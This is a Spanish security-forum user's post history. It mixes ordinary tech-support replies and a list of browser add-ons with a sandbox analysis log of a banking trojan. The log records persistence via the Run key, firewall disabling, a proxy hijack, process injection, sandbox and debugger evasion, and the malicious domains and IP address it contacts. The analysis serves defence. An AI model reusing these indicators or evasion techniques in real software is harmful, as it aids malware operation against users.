elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


  Mostrar Mensajes
Páginas: 1 ... 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 [88] 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 ... 122
871  Sistemas Operativos / GNU/Linux / Re: ¿¿Problemas con el repositorio?? en: 20 Febrero 2013, 00:33 am
Echa un vistazo a este tema:
http://bfwiki.tellefsen.net/index.php/Installing_Bluefish

Probaste el comando sin los asteristos:
Código:
yum list bluefish

Saludos.
872  Seguridad Informática / Seguridad / Re: Como eliminar Virus Recycler.bin? en: 20 Febrero 2013, 00:18 am
Si no te funciona, con Gmer puedes ver y eliminar esos archivos, es un antirootkit (pestaña File).
También sería aconsejable eliminar los puntos de restauración del sistema, algunos se copian a esa carpeta.

Gmer: http://www.gmer.net/
D.Directa: http://www2.gmer.net/gmer.zip

Saludos.
873  Seguridad Informática / Seguridad / Re: ¡¡Cuidado con el correo de ONO con ADSL gratis!! en: 20 Febrero 2013, 00:09 am
Gracias por la adverténcia, te he enviado un MP.

Saludos.
874  Seguridad Informática / Seguridad / Plugins para los navegadores (FF, IE, O, M, CD, S) en: 20 Febrero 2013, 00:03 am
Listado actualizado de complementos para los navegadores:

Firefox: https://addons.mozilla.org/es/firefox/

Descargar Firefox: http://www.mozilla.org/es-ES/firefox/fx/

NoScript: https://addons.mozilla.org/es/firefox/addon/noscript/?src=cb-dl-mostpopular
Wot: https://addons.mozilla.org/es/firefox/addon/wot-safe-browsing-tool/?src=cb-dl-mostpopular
Adblock Plus: https://addons.mozilla.org/es/firefox/addon/adblock-plus/?src=cb-dl-mostpopular
AdblockPlus Pop-upAddon: https://addons.mozilla.org/es/firefox/addon/adblock-plus-pop-up-addon/?src=cb-dl-mostpopular
Ghostery: https://addons.mozilla.org/es/firefox/addon/ghostery/?src=cb-dl-mostpopular
Better Privacy: https://addons.mozilla.org/es/firefox/addon/betterprivacy/?src=cb-dl-mostpopular
NOGoogleAnalytics: https://addons.mozilla.org/es/firefox/addon/no-google-analytics/?src=cb-dl-recentlyadded
DuckDuckGo Search: https://addons.mozilla.org/es/firefox/addon/duckduckgo-for-firefox/?src=cb-dl-featured

** Si instalas muchos plugins en Firefox puede consumir mucha memoria, se aconseja instalar MemoryFox:
MemoryFox: https://addons.mozilla.org/es/firefox/addon/memory-fox/


Internet Explorer: http://www.iegallery.com/PinnedSites

Descargar Internet Explorer: http://ie9.discoverbing.com/intl/es-xl/index.html

Dr.Web LinkChecker: http://www.freedrweb.com/linkchecker/internet+explorer/
Wot: http://www.mywot.com/es/download/ie
McAfee Site Advisor: https://sadownload.mcafee.com/products/SA/Website/saSetup.exe
G-Data Cloud Security: https://www.gdata.de/?eID=PushFile&dl=deea11a7a2%3AAFIGDQY%3D
:


Google Chrome: https://chrome.google.com/webstore/

Descargar Google Chrome:

Adblock Plus: https://chrome.google.com/webstore/detail/adblock-plus/cfhdojbkjhnklbpkdaibdccddilifddb?hl=es
DuckDuckGo: https://chrome.google.com/webstore/detail/duckduckgo-for-chrome/bpphkkgodbfncbcpgopijlfakfgmclao?hl=es
Wot: https://chrome.google.com/webstore/detail/wot/bhmmomiinigofkjcapegjjndpbikblnp?hl=es
GeoProxy: https://chrome.google.com/webstore/detail/geoproxy/pooljnboifbodgifngpppfklhifechoe?hl=es
Click&Clean: https://chrome.google.com/webstore/detail/clickclean/ghgabhipcejejjmhhchfonmamedcbeod?hl=es
DoNotTrackMe: https://chrome.google.com/webstore/detail/donottrackme/epanfjkfahimkgomnigadpkobaefekcd?hl=es
Webmail AdBlocker: https://chrome.google.com/webstore/detail/webmail-ad-blocker/cbhfdchmklhpcngcgjmpdbjakdggkkjp?hl=es
Webutation: https://chrome.google.com/webstore/detail/webutation/nfclfmabiojpommfcalfdgjjeaahnjbj?hl=es
MetaSurf: https://chrome.google.com/webstore/detail/metasurf/dpfbddcgbimoafpgmbbjiliegkfcjkmn?hl=es
Dr.WebAnti-Virus Link Checker: https://chrome.google.com/webstore/detail/drweb-anti-virus-link-che/aleggpabliehgbeagmfhnodcijcmbonb?hl=es
HideMyAss! WebProxy: https://chrome.google.com/webstore/detail/hide-my-ass-web-proxy/cmgnmcnlncejehjlnhaglpnoolgbflbd?hl=es
Bitdefender QuickScan: https://chrome.google.com/webstore/detail/bitdefender-quickscan/pdnkcidphdcakpkheohlhocaicfamjie?hl=es
javascript PopupBlocker: https://chrome.google.com/webstore/detail/javascript-popup-blocker/hiajdlfgbgnnjakkbnpdhmhfhklkbiol?hl=es
FoxyProxy Standard: https://chrome.google.com/webstore/detail/foxy-proxy-standard/gcknhkkoolaabfmlnjonogaaifnjlfnp?hl=es
Traffic Light: https://chrome.google.com/webstore/detail/trafficlight/cfnpidifppmenkapgihekkeednfoenal?hl=es
Qualys BrowserCheck: https://chrome.google.com/webstore/detail/qualys-browsercheck/ejhnkognlohdkpjkjongioociddgoibk?hl=es
SafeGmail: https://chrome.google.com/webstore/detail/safegmail/lmjkmpdndmbieflefonjgnnfimmkbedf?hl=es
SurfPatrol: https://chrome.google.com/webstore/detail/surfpatrol/jkppgpkggbadgdkdjephjfpmblapdcpb?utm_source=chrome%20-ntp-icon


Opera: https://addons.opera.com/es/

Descargar Opera: http://www.opera.com/download/

Adblock Plus: https://addons.opera.com/es/extensions/details/opera-adblock/?display=en
Wot: https://addons.opera.com/es/extensions/details/wot/?display=es
Dr.Web Link Checker: https://addons.opera.com/es/extensions/details/drweb-link-checker-2/?display=es
Ghostery: https://addons.opera.com/es/extensions/details/ghostery/?display=en
NotScripts: https://addons.opera.com/es/extensions/details/notscripts/?display=en
NoAds: https://addons.opera.com/es/extensions/details/noads/?display=en
NoAds Advanced: https://addons.opera.com/es/extensions/details/noads-advanced/?display=es
DuckDuckGo: https://addons.opera.com/es/extensions/details/duckduckgo-for-opera-2/?display=en


Safari:

Descarga Safari: http://support.apple.com/kb/DL1531?viewlocale=es_ES

Wot: http://www.mywot.com/files/downloads/wot-20100712.safariextz
javascript Blocker: http://dl.dropbox.com/u/11967/JS%20Blocker.safariextz
AdBlock Plus: http://safariadblock.com/AdBlockForSafari.safariextz
Dr. Web Link Checker: http://download.geo.drweb.com/pub/drweb/linkchecker/Safari/2.0/safari.linkchecker.safariextz
Traffic Light: http://download.bitdefender.com/npd/trafficlight/extensions/safari/TrafficLight.safariextz
Ghostery: http://www.ghostery.com/safari/Ghostery.safariextz
Incognito: http://www.orbicule.com/incognito/Incognito.safariextz
Cookie stumbler: http://www.writeitstudios.com/extensions/Cookie%20Stumbler.safariextz


Maxthon: http://extension.maxthon.com/

Descarga Maxthon: http://es.maxthon.com/

:
:
:
:
:
:


Comodo Dragón: https://chrome.google.com/webstore/category/extensions

Descargar Comodo Dragón: http://www.comodo.com/dragon/intl/en-GB/browserchoice/index.html?track=1870

Trabaja con los mismos plugins de Chrome, aunque los navegadores son diferentes.
Dragón incluye dos modulos de seguridad: Comodo Share Page Service y Comodo Web Inspector.


** En construcción, si teneis más complementos para añadir en cualquier navegador comentar en este tema.

Saludos.

Actualizado: 20.02.2013
875  Seguridad Informática / Seguridad / Re: tyoyanos en: 17 Febrero 2013, 13:49 pm
Hola OmarHack gracias por los comentarios, intentad no subir programas que incluyan cracks o similares, por mi mientras el programa esté limpio no hay problema pero son las normas del foro.

Saludos.
876  Seguridad Informática / Seguridad / Re: tyoyanos en: 17 Febrero 2013, 12:36 pm
Hola inicia el pc en "modo seguro". y desactiva los puntos de restauración del sistema.

Inicio-Panel de control-Sistema:
Entra en la pestaña "Restaurar sistema" y destilda la opción: Desactivar Restaurar sistema en todas las unidades.

Se borrarán todos los puntos de restauración del sistema, así ahora dale un escaneo profundo con Malwarebytes y tu antivirus, cuando lo elimine ya no se podrá restaurar de nuevo.

Elimina archivos temporales, de uso y navegación con CCleaner por ejemplo, luego reinicia y comenta los resultados, si no funcionó buscaremos otra alternativa.

Saludos.
877  Seguridad Informática / Seguridad / Re: Comprobar la ultima vez que se han podido ver los archivos del disco duro extern en: 16 Febrero 2013, 15:15 pm
Creo que sin una comparativa hecha en disco mediante algun programa, solo podrás revisar las Propiedades de los archivos y ver fechas de último acceso o modificación como has comentado. Si está dentro del margen de fecha en el que ha sido "robado" sabrás si han accedido.

Comentale que hay programas que encriptan archivos o discos (en el caso de info confidencial), en ese caso le hubiera sido casi imposible acceder.

Saludos.
878  Seguridad Informática / Análisis y Diseño de Malware / Re: Troyano bancario II (diferente configuración). en: 16 Febrero 2013, 14:53 pm
Sigue el log...
Código:
SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\windows\system32\drwtsn32.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\dwwin.exe) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\msv1_0.dll) [c:\windows\system32\dwwin.exe]
OpenProcessToken(C:\WINDOWS\system32\drwtsn32.exe) [c:\windows\system32\drwtsn32.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\windows\system32\drwtsn32.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\windows\system32\drwtsn32.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\windows\system32\drwtsn32.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\windows\system32\drwtsn32.exe]
GetModuleHandle(LPK.DLL) [c:\windows\system32\drwtsn32.exe]
OpenProcess(drwtsn32.exe) [c:\windows\system32\drwtsn32.exe]
GetModuleHandle(USER32) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(imm32.dll) [c:\windows\system32\drwtsn32.exe]
CreateEvent(Global\userenv:  User Profile setup event) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\windows\system32\drwtsn32.exe]
ResumeThread() [c:\windows\system32\drwtsn32.exe]
LoadLibrary(ntdll.dll) [c:\windows\system32\drwtsn32.exe]
CreateEvent(DbgEngEvent_00000550) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(rpcrt4.dll) [c:\windows\system32\drwtsn32.exe]
GetComputerName() [c:\windows\system32\drwtsn32.exe]
AdjustTokenPrivileges(SE_PRIVILEGE_ENABLED) [c:\windows\system32\drwtsn32.exe]
OpenProcess(HxD.exe) [c:\windows\system32\drwtsn32.exe]
VirtualAllocEx(c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe,MEM_RESERVE,PAGE_READWRITE) [c:\windows\system32\drwtsn32.exe]
VirtualAllocEx(c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe,MEM_COMMIT,PAGE_READWRITE) [c:\windows\system32\drwtsn32.exe]
WriteProcessMemory(c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe) [c:\windows\system32\drwtsn32.exe]
CreateFile(C:\Documents and Settings\All Users\Datos de programa\Microsoft\Dr Watson\drwtsn32.log) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\kernel32.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(c:\windows\system32\exts.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(c:\windows\system32\ntsdexts.dll) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe) [c:\windows\system32\drwtsn32.exe]
GetModuleHandle(ntdll.dll) [c:\windows\system32\drwtsn32.exe]
SuspendThread(1848) [c:\windows\system32\drwtsn32.exe]
SuspendThread(1900) [c:\windows\system32\drwtsn32.exe]
SuspendThread(1836) [c:\windows\system32\drwtsn32.exe]
SuspendThread(1832) [c:\windows\system32\drwtsn32.exe]
SuspendThread(1676) [c:\windows\system32\drwtsn32.exe]
Sleep(0) [c:\windows\system32\drwtsn32.exe]
GetUserName() [c:\windows\system32\drwtsn32.exe]
LoadLibrary(secur32.dll) [c:\windows\system32\drwtsn32.exe]
QuerySystemInformation() [c:\windows\system32\drwtsn32.exe]
OpenProcess(System) [c:\windows\system32\drwtsn32.exe]
OpenProcess(smss.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\windows\system32\smss.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(csrss.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(winlogon.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\windows\system32\winlogon.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(services.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\windows\system32\services.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(lsass.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\windows\system32\lsass.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(VBoxService.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\windows\system32\vboxservice.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(svchost.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\windows\system32\svchost.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(SbieSvc.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\archivos de programa\sandboxie\sbiesvc.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(explorer.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\windows\explorer.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(VBoxTray.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\windows\system32\vboxtray.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(ctfmon.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\windows\system32\ctfmon.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(alg.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(XueTr.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\documents and settings\r32\mis documentos\tools\xuetr\xuetr.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(u1210.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\documents and settings\r32\mis documentos\tools\red\u1210.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(iexplore.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\archivos de programa\internet explorer\iexplore.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(firefox.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\archivos de programa\mozilla firefox\firefox.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(BSA.EXE) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\documents and settings\r32\mis documentos\descargas\bsa\bsa.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(sniff_hit.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\idefense\map\sniff_hit.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(wireshark.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\archivos de programa\wireshark\wireshark.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(dumpcap.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\archivos de programa\wireshark\dumpcap.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(SbieCtrl.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\archivos de programa\sandboxie\sbiectrl.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(procexp.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\documents and settings\r32\mis documentos\tools\procexp.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(wmiprvse.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(SandboxieRpcSs.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\archivos de programa\sandboxie\sandboxierpcss.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(SandboxieDcomLaunch.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\archivos de programa\sandboxie\sandboxiedcomlaunch.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(winsa64.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\windows\system32\drwtsn32.exe) [c:\windows\system32\drwtsn32.exe]
TerminateProcess(à?¤\dee\harskvol1\do) [c:\windows\system32\drwtsn32.exe]
CreateFile(C:\Documents and Settings\All Users\Datos de programa\Microsoft\Dr Watson\user.dmp) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(psapi.dll) [c:\windows\system32\drwtsn32.exe]
CreateToolhelp32Snapshot(TH32C2_SNAPALL,964) [c:\windows\system32\drwtsn32.exe]
SuspendThread(1648) [c:\windows\system32\drwtsn32.exe]
SuspendThread(1644) [c:\windows\system32\drwtsn32.exe]
SuspendThread(1640) [c:\windows\system32\drwtsn32.exe]
SuspendThread(1636) [c:\windows\system32\drwtsn32.exe]
FreeLibrary() [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\ntdll.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\USER32.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\GDI32.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\IMM32.DLL) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\ADVAPI32.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\RPCRT4.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\Secur32.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\OLEAUT32.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\msvcrt.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\ole32.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\VERSION.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\SHLWAPI.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\SHELL32.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\WINMM.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\UxTheme.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\psapi.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\MSACM32.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\DBGHELP.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\exts.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\ntsdexts.dll) [c:\windows\system32\drwtsn32.exe]
GetModuleHandle(mscoree.dll) [c:\windows\system32\drwtsn32.exe]
ExitProcess(0) [c:\windows\system32\drwtsn32.exe]
GetModuleHandle(EXPLORER.EXE) [c:\windows\system32\drwtsn32.exe]
GetModuleHandle(C:\WINDOWS\system32\Msctf.dll) [c:\windows\winsa64.exe]
Código:
Report generated with Buster Sandbox Analyzer 1.85 at 12:31:20 on 08/02/2013

 [ General information ]
   * File name: c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe

 [ Changes to filesystem ]
   * Creates file C:\WINDOWS\winsa64.cfg
   * Creates file C:\WINDOWS\winsa64.exe
   * Creates file C:\Documents and Settings\All Users\Datos de programa\Microsoft\Dr Watson\drwtsn32.log
   * Creates file C:\Documents and Settings\All Users\Datos de programa\Microsoft\Dr Watson\user.dmp
   * Modifies file C:\Documents and Settings\r32\Configuración local\Archivos temporales de Internet\Content.IE5\index.dat
   * Modifies file C:\Documents and Settings\r32\Configuración local\Historial\History.IE5\index.dat
   * Modifies file C:\Documents and Settings\r32\Cookies\index.dat

 [ Changes to registry ]
   * Modifies value "NumberOfCrashes=00000003" in key HKEY_LOCAL_MACHINE\software\microsoft\DrWatson
          old value "NumberOfCrashes=00000002"
   * Modifies value "NukeOnDelete=00000001" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Explorer\BitBucket
          old value empty
   * Creates value "DisableNotifications=00000001" in key HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile
   * Creates value "DisableNotifications=00000001" in key HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile
   * Modifies value "DisableNotifications=00000001" in key HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile
          old value empty
   * Empties value "EnableFirewall" in key HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile
         old value "EnableFirewall=00000001"
   * Modifies value "ProxyEnable=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings
          old value empty
   * Creates value "ProxyServer=3100320037002E0030002E0030002E0031003A0039003600360036000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings
                    binary data=127.0.0.1:9666
   * Modifies value "ProxyOverride=3100320037002E0030002E0030002E0031000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings
                       binary data=127.0.0.1
          old value "ProxyOverride=6C006F00630061006C000000"
                       binary data=local
   * Creates Registry key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013020720130208
   * Creates Registry key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013020820130209
   * Modifies value "SavedLegacySettings=46000000B9010000030000000E0000003132372E302E302E313A39363636090000003132372E302E302E3100000000040000000000000050EB206AFBFACD01010000000A00020F000000000000000000000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
          old value "SavedLegacySettings=46000000BA0100000100000000000000050000006C6F63616C00000000040000000000000050EB206AFBFACD01010000000A00020F000000000000000000000000"
   * Creates value "winsa64=43003A005C00570049004E0044004F00570053005C00770069006E0073006100360034002E006500780065000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Run
                binary data=C:\WINDOWS\winsa64.exe

 [ Network services ]
   * Looks for an Internet connection.
   * Queries DNS "www.cadastramento.net".
   * Queries DNS "www.chabvf.info".
   * Queries DNS "www.yoeqtxutb.info".
   * Queries DNS "www.itjdcryfa.info".
   * Queries DNS "solutionfinder.microsoft.com".
   * Queries DNS "s3.amazonaws.com".
   * Queries DNS "google.es".
   * Queries DNS "www3.nationalgeographic.com".
   * Queries DNS "google.bg".
   * Queries DNS "google.net".
   * Queries DNS "google.co.uk".
   * Queries DNS "google.kz".
   * Queries DNS "google.pt".
   * Queries DNS "google.by".
   * C:\WINDOWS\winsa64.exe Connects to "212.1.208.24" on port 80 (TCP - HTTP).
   * Downloads file from "www.cadastramento.net/sistema.html".

 [ Process/window/string information ]
   * Enables process privileges.
   * Gets user name information.
   * Gets system default language ID.
   * Gets computer name.
   * Checks for debuggers.
   * Creates a mutex "CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Anti-Malware Analyzer routine: WinDbg detection.
   * Anti-Malware Analyzer routine: Sandboxie detection.
   * Creates an event named "ShellCopyEngineRunning".
   * Creates an event named "ShellCopyEngineFinished".
   * Creates a mutex "INSONIA".
   * Creates a mutex "HxD{73025671-91B6-473C-B0EE-6EAB6FD0E6DE}".
   * Creates a mutex "MSCTF.Shared.MUTEX.EBH".
   * Opens a service named "AudioSrv".
   * Creates a mutex "MidiMapper_modLongMessage_RefCnt".
   * Creates a mutex "MidiMapper_Configure".
   * Enumerates running processes.
   * Creates process "(null),C:\WINDOWS\system32\dwwin.exe -x -s 456,C:\WINDOWS\system32".
   * Injects code into process "c:\windows\system32\dwwin.exe".
   * Creates a mutex "SHIMLIB_LOG_MUTEX".
   * Creates a mutex "Local\_!MSFTHISTORY!_".
   * Creates a mutex "Local\c:!documents and settings!r32!configuración local!archivos temporales de internet!content.ie5!".
   * Creates a mutex "Local\c:!documents and settings!r32!cookies!".
   * Creates a mutex "Local\c:!documents and settings!r32!configuración local!historial!history.ie5!".
   * Creates a mutex "RasPbFile".
   * Lists all entry names in a remote access phone book.
   * Opens a service named "RASMAN".
   * Opens a service named "Sens".
   * Injects code into process "c:\windows\system32\drwtsn32.exe".
   * Creates an event named "DbgEngEvent_00000550".
   * Injects code into process "c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe".
   * Terminates process "à?¤\dee\harskvol1\do".
   * Contains string Anubis detection routine found ("76487-337-8429955-22614")
   * Contains string Sandboxie detection routine found ("SbieDll.dll")
Extrayendo información de mis sistema:

Code:

Código:
Report generated with Buster Sandbox Analyzer 1.85 at 12:31:20 on 08/02/2013

Detailed report of suspicious malware actions:

Anubis detection routine found
Checked for debuggers
Created a mutex named: CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: HxD{73025671-91B6-473C-B0EE-6EAB6FD0E6DE}
Created a mutex named: INSONIA
Created a mutex named: Local\_!MSFTHISTORY!_
Created a mutex named: Local\c:!documents and settings!r32!configuración local!archivos temporales de internet!content.ie5!
Created a mutex named: Local\c:!documents and settings!r32!configuración local!historial!history.ie5!
Created a mutex named: Local\c:!documents and settings!r32!cookies!
Created a mutex named: MidiMapper_Configure
Created a mutex named: MidiMapper_modLongMessage_RefCnt
Created a mutex named: MSCTF.Shared.MUTEX.EBH
Created a mutex named: RasPbFile
Created a mutex named: SHIMLIB_LOG_MUTEX
Created file in defined folder: C:\Documents and Settings\All Users\Datos de programa\Microsoft\Dr Watson\drwtsn32.log
Created file in defined folder: C:\Documents and Settings\All Users\Datos de programa\Microsoft\Dr Watson\user.dmp
Created process: (null),C:\WINDOWS\system32\dwwin.exe -x -s 456,C:\WINDOWS\system32
Defined file type created in Windows folder: C:\WINDOWS\winsa64.exe
Defined registry AutoStart location created or modified: machine\system\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\DisableNotifications = 00000001
Defined registry AutoStart location created or modified: machine\system\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\DisableNotifications = 00000001
Defined registry AutoStart location created or modified: machine\system\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications = 00000001
Defined registry AutoStart location created or modified: user\current\software\Microsoft\Windows\CurrentVersion\Run\winsa64 = 43003A005C00570049004E0044004F00570053005C00770069006E0073006100360034002E006500780065000000
File copied itself
Firewall settings change: machine\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\enablefirewall = empty value key
Got computer name
Got system default language ID
Got user name information
Internet connection: C:\WINDOWS\winsa64.exe Connects to "212.1.208.24" on port 80 (TCP - HTTP)
Listed all entry names in a remote access phone book
Modified file in defined folder: C:\Documents and Settings\r32\Configuración local\Archivos temporales de Internet\Content.IE5\index.dat
Modified file in defined folder: C:\Documents and Settings\r32\Configuración local\Historial\History.IE5\index.dat
Modified file in defined folder: C:\Documents and Settings\r32\Cookies\index.dat
Queried DNS: google.bg
Queried DNS: google.by
Queried DNS: google.co.uk
Queried DNS: google.es
Queried DNS: google.kz
Queried DNS: google.net
Queried DNS: google.pt
Queried DNS: s3.amazonaws.com
Queried DNS: solutionfinder.microsoft.com
Queried DNS: www.cadastramento.net
Queried DNS: www.chabvf.info
Queried DNS: www.itjdcryfa.info
Queried DNS: www.yoeqtxutb.info
Queried DNS: www3.nationalgeographic.com
Sandboxie detection routine found
Terminated process: à?¤\dee\harskvol1\do
